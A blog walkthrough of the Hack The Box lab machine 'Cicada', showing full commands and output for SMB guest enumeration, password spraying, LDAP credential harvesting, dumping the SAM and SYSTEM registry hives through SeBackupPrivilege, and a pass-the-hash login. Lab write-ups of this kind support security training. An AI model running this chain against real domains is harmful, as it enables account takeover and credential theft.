ryuki's blog

Cicada

Feb 15, 202510 min read

Machine Card listing Cicada as an easy Windows box

Reconnaissance

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-29 19:51:54Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time:
|   date: 2024-09-29T19:52:34
|_  start_date: N/A

Based on the open ports I’m dealing with a Domain Controller for the cicada.htb domain with the DNS name of cicada-dc.cicada.htb. I’ll add both to /etc/hosts before proceeding.

Initial Access

First off I check if SMB can be accessed without an account or by using guest. Without credentials the server denies access, but the guest user is able to list the shares and has also READ access to to HR and IPC$.

$ nxc smb cicada.htb -u '' -p '' --shares
SMB         10.129.180.234  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.234  445    CICADA-DC        [+] cicada.htb\: 
SMB         10.129.180.234  445    CICADA-DC        [-] Error enumerating shares: STATUS_ACCESS_DENIED
 
$ nxc smb cicada.htb -u 'guest' -p '' --shares
SMB         10.129.180.234  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.234  445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.129.180.234  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.180.234  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.180.234  445    CICADA-DC        -----           -----------     ------
SMB         10.129.180.234  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.180.234  445    CICADA-DC        C$                              Default share
SMB         10.129.180.234  445    CICADA-DC        DEV                             
SMB         10.129.180.234  445    CICADA-DC        HR              READ            
SMB         10.129.180.234  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.180.234  445    CICADA-DC        NETLOGON                        Logon server share 
SMB         10.129.180.234  445    CICADA-DC        SYSVOL                          Logon server share

Listing all files present on the HR share only returns Notice from HR.txt, that I download to have a closer look.

$ nxc smb cicada.htb -u 'guest' -p '' --spider HR --regex "."
SMB         10.129.180.234  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.234  445    CICADA-DC        [+] cicada.htb\guest:
SMB         10.129.180.234  445    CICADA-DC        [*] Started spidering
SMB         10.129.180.234  445    CICADA-DC        [*] Spidering .
SMB         10.129.180.234  445    CICADA-DC        //10.129.180.234/HR/. [dir]
SMB         10.129.180.234  445    CICADA-DC        //10.129.180.234/HR/.. [dir]
SMB         10.129.180.234  445    CICADA-DC        //10.129.180.234/HR/Notice from HR.txt [lastm:'2024-08-28 19:31' size:1266]
SMB         10.129.180.234  445    CICADA-DC        [*] Done spidering (Completed in 0.1164097785949707)
 
$ nxc smb cicada.htb -u 'guest' -p '' --share HR --get-file "Notice from HR.txt" "Notice from HR.txt"
SMB         10.129.180.234  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.234  445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.129.180.234  445    CICADA-DC        [*] Copying "Notice from HR.txt" to "Notice from HR.txt"
SMB         10.129.180.234  445    CICADA-DC        [+] File "Notice from HR.txt" was downloaded to "Notice from HR.txt"

The notice from the human ressources department seems to be a welcome message for new hires. It does list the default password Cicada$M6Corpb*@Lp#nZp!8 and provides instructions on how to change it.

Notice from HR.txt
Dear new hire!
 
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
 
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
 
To change your password:
 
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
 
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
 
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
 
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
 
Best regards,
Cicada Corp

Since it’s more of a generic note, it does not include a username to be used alongside the password. With the help of nxc its also possible to bruteforce valid users by incremeting the relative identifier (RID)1.
Doing so returns multiple (well-known) groups and users. I’ll add the usernames (without domain) to a text file.

$ nxc smb cicada.htb -u 'guest' -p '' --rid-brute
SMB         10.129.180.234  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.234  445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.129.180.234  445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.129.180.234  445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.180.234  445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.180.234  445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.180.234  445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.129.180.234  445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

Maybe one of those users did not change the default password and I may overtake the account. Through spraying the password, I can quickly see that the password is still valid for michael.wrightson.

$ nxc smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB         10.129.180.234  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.234  445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.180.234  445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.180.234  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.129.180.234  445    CICADA-DC        [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.180.234  445    CICADA-DC        [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE

Using the credentials for michael.wrightson does not grant additional access on SMB but I can use it to connect to Active Directory through ldap and dump the users with their description.
This does return the credentials david.orelious:aRt$Lp#7t*VQ!3.

$ nxc ldap cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB         10.129.180.234  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.129.180.234  389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
LDAP        10.129.180.234  389    CICADA-DC        [*] Enumerated 8 domain users: cicada.htb
LDAP        10.129.180.234  389    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-
LDAP        10.129.180.234  389    CICADA-DC        Administrator                 2024-08-26 20:08:03 0       Built-in account for administering the computer/domain
LDAP        10.129.180.234  389    CICADA-DC        Guest                         2024-08-28 17:26:56 0       Built-in account for guest access to the computer/domain
LDAP        10.129.180.234  389    CICADA-DC        krbtgt                        2024-03-14 11:14:10 0       Key Distribution Center Service Account
LDAP        10.129.180.234  389    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 2
LDAP        10.129.180.234  389    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 2
LDAP        10.129.180.234  389    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0
LDAP        10.129.180.234  389    CICADA-DC        david.orelious                2024-03-14 12:17:29 1       Just in case I forget my password is aRt$Lp#7t*VQ!3
LDAP        10.129.180.234  389    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 1

With the newly obtained credentials I do get access to the SMB share Dev where I find and download a file called Backup_Script.ps1.

$ nxc smb cicada.htb -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --spider Dev --regex "."
SMB         10.129.180.234   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.234   445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         10.129.180.234   445    CICADA-DC        [*] Started spidering
SMB         10.129.180.234   445    CICADA-DC        [*] Spidering .
SMB         10.129.180.234   445    CICADA-DC        //10.129.180.234/Dev/. [dir]
SMB         10.129.180.234   445    CICADA-DC        //10.129.180.234/Dev/.. [dir]
SMB         10.129.180.234   445    CICADA-DC        //10.129.180.234/Dev/Backup_script.ps1 [lastm:'2024-08-28 19:28' size:601]
SMB         10.129.180.234   445    CICADA-DC        [*] Done spidering (Completed in 0.11278557777404785)
 
$ nxc smb cicada.htb -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --spider Dev --regex "."
SMB         10.129.180.234   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.234   445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         10.129.180.234   445    CICADA-DC        [*] Started spidering
SMB         10.129.180.234   445    CICADA-DC        [*] Spidering .
SMB         10.129.180.234   445    CICADA-DC        //10.129.180.234/Dev/. [dir]
SMB         10.129.180.234   445    CICADA-DC        //10.129.180.234/Dev/.. [dir]
SMB         10.129.180.234   445    CICADA-DC        //10.129.180.234/Dev/Backup_script.ps1 [lastm:'2024-08-28 19:28' size:601]
SMB         10.129.180.234   445    CICADA-DC        [*] Done spidering (Completed in 0.11278557777404785)

Checking its, contents I find the credentials emily.oscars:Q!3@Lp#M6b*7t*Vt. Those allow me to log into the machine via WinRM and collect the first flag.

Backup_Script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
 
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

Privilege Escalation

The account emily.oscars has the SeBackupPrivilege enabled, letting me grab the SAM and SYSTEM registry hives to extract the NTLM hash for the administrator account.

whoami /priv
 
PRIVILEGES INFORMATION
----------------------
 
Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

First I’ll dump the registry hives and then download them via evil-winrm’s built-in download feature to my local machine.

# In Evil-WinRM session
reg save hklm\sam sam
reg save hklm\system system
 
# Download the files (takes a bit)
download sam
download system

After downloading the files I can pass them to secretsdump.py from impacket to extract the hashes for all local accounts including the Administrator.

$ impacket-secretsdump -system SYSTEM -sam SAM local
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

Obtaining the hash for the admin account lets me use it via WinRM and collect the final flag.

evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i cicada.htb

Attack Path

flowchart TD

subgraph "Initial access"
    A(Guest Access to SMB) -->|Note from HR| B(Default password)
    A -->|RID Bruteforce| C(List of users)
    B & C -->|Password Spraying| D(Credentials for michael.wrightson)
    D -->|Dump LDAP Descriptions| E(Credentials for david.orelious)
    E -->|Access to Dev SMB Share| F(Credentials for emily.oscars)
end

subgraph "Privilege Escalation"
    F -->|SeBackupPrivilege| G(Backup SAM and SYSTEM registry hives)
    G -->|secretsdump| H(Hash for Administrator)
end

Footnotes

  1. Enumerate Users by Bruteforcing RID

Recent ...